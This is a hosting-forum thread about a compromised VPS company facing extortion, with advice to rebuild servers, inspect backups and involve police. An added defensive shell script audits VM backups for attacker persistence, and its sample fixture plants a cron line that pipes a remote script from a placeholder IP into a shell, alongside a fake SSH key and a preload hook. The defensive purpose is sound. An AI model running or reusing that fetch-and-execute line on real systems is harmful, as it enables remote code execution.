Compromised Server - Attackers have information.

Posted by 3dhomejoe, 08-01-2013, 05:39 AM
Hello WHT, I have recently taken over a (VPS) hosting company, and the previous owner did not have very high standards on security. I have since gone around and started to improve the security, but it has come to my attention that the servers have been compromised and the attackers are demanding money or they will release information that they have taken. The information that they have taken/have access to includes, but is not limited to, my SolusVM database and the old WHMCS database before it was migrated to a different server entirely. They also claim to have root access to all of my systems, the SolusVM master, the slave, and the website VPSes, along with information about all of my clients and what they have on the VPSes. What would be the best approach to making sure they are fully out of my systems? I am not going to be paying them any money for their word that they would "leave" all of my systems and delete any data gathered. Any advice will be very helpful. Thanks, Joe

Posted by Steven, 08-01-2013, 11:16 AM
Start by setting up a new server for SolusVM and securing that, and OS reload each node and restore VM backups, or set up new servers and migrate them. Do the same for WHMCS. Don't host it on a shared server either. In cases like this, don't listen to people who claim to be able to clean the system.

Posted by whmcsguru, 08-01-2013, 11:54 AM
I'm with Steven on everything but the last one. Never take a chance on someone that claims they can 'clean the system'. Sure, it might be able to be done (I've done it a few times), but there's always that nagging feeling that you missed something, somewhere. There's always that chance that you're going to miss something. When you set up the new VMs, make sure they're using different (root) passwords, of course.

Posted by tnhadmin, 08-01-2013, 12:06 PM
They would have used the recent SolusVM vulnerability to gain access to your server. I agree with Steven, but make sure you examine your data before migration, as they might leave something behind to gain access to your data again. So you had better hire a security expert to check out your data. It's a better idea than paying money to hackers.
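The check tnhadmin describes (look through the data before you carry it over) is the step most people skip, so here is an added example, not code from the thread or from SolusVM/WHMCS, of what that audit looks like against a VM backup that has been mounted read-only on the new node. The mount point (/mnt/vm101) is a hypothetical path, and the sample tree the script builds when run without an argument is constructed for illustration. It reports the persistence mechanisms a new root password does nothing about: extra UID-0 accounts, SSH authorized_keys entries, cron jobs, and an ld.so.preload entry. It is a starting list, not proof the image is clean; anything it flags is a reason to rebuild the guest rather than migrate it.

```shell
#!/bin/sh
# Added example, not part of the thread: audit a mounted VM backup (or a
# chroot) for persistence an attacker may have left behind before the data
# is migrated onto a freshly reloaded node. $1 is the mount point of the
# backup, e.g. /mnt/vm101 (hypothetical). Prints one tagged line per
# finding and nothing when none of these checks fire.

audit_backup() {
    root="${1%/}"

    # 1. Any account other than root with UID 0 is a second root login.
    [ -f "$root/etc/passwd" ] &&
        awk -F: '$3 == 0 && $1 != "root" { print "UID0_ACCOUNT " $1 }' "$root/etc/passwd"

    # 2. Every authorized_keys entry is a login that ignores the root
    #    password, so rotating passwords alone does not evict its holder.
    #    Only the key type and trailing comment are shown, not the key body.
    for f in "$root"/root/.ssh/authorized_keys "$root"/home/*/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$f" | while IFS= read -r key; do
            printf 'SSH_KEY %s: %s\n' "${f#"$root"}" "$(printf '%s' "$key" | awk '{ print $1, $NF }')"
        done
    done

    # 3. Cron jobs: system cron.d plus the per-user spools.
    for f in "$root"/etc/cron.d/* "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$f" | while IFS= read -r job; do
            printf 'CRON %s: %s\n' "${f#"$root"}" "$job"
        done
    done

    # 4. A library listed in ld.so.preload is loaded into every dynamically
    #    linked process on the box, a classic userland rootkit hook.
    [ -s "$root/etc/ld.so.preload" ] &&
        printf 'LD_PRELOAD %s\n' "$(tr '\n' ' ' < "$root/etc/ld.so.preload")"

    return 0
}

# Constructed sample tree standing in for a mounted backup: a planted second
# UID-0 user, a foreign SSH key on root, a cron job that pulls a script from
# a TEST-NET address, and a preload entry. Echoes the directory it created.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/cron.d" "$d/root/.ssh" "$d/home/joe/.ssh" "$d/var/spool/cron"
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$d/etc/passwd"
    printf 'joe:x:1000:1000::/home/joe:/bin/bash\n' >> "$d/etc/passwd"
    printf 'sysadm:x:0:0::/:/bin/bash\n' >> "$d/etc/passwd"
    printf '# constructed key, not a real one\n' > "$d/root/.ssh/authorized_keys"
    printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIconstructedkey attacker@example.invalid\n' >> "$d/root/.ssh/authorized_keys"
    printf '*/10 * * * * root curl -s http://198.51.100.7/c | sh\n' > "$d/etc/cron.d/update"
    printf '/usr/lib/libproc-hook.so\n' > "$d/etc/ld.so.preload"
    echo "$d"
}

# Usage: sh audit_backup.sh /mnt/vm101
# With no argument the script audits the constructed sample tree instead.
if [ -n "$1" ]; then
    audit_backup "$1"
else
    tree=$(make_sample_tree)
    audit_backup "$tree"
    rm -rf "$tree"
fi
```

Run it against each guest image before it is restored, and extend the list with whatever the SolusVM master itself trusts: the slaves' SSH keys, API keys in the SolusVM database, and any WHMCS admin accounts, since those are the credentials a rebuild has to rotate, not just the node root passwords.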

Posted by Steven, 08-01-2013, 12:06 PM
The reason I said that is there are some cases where a compromised server is not really a server that's compromised but a specific account. In cases like that you don't need to reload the OS. I didn't want to portray that any time there is a compromise of any level of magnitude an OS reload must happen.

Posted by HostUS - Alexander, 08-01-2013, 12:19 PM
Contact your local police station, set up a sting. Send money, money gets traced, they get arrested. Wish it was as simple as that ^. Seriously though, if they are demanding money, contact your local police. - Alexander

Posted by 3dhomejoe, 08-01-2013, 03:27 PM
Thank you for all of the replies, I really appreciate it. They are demanding the money in bitcoins, so that would be a little harder to track.
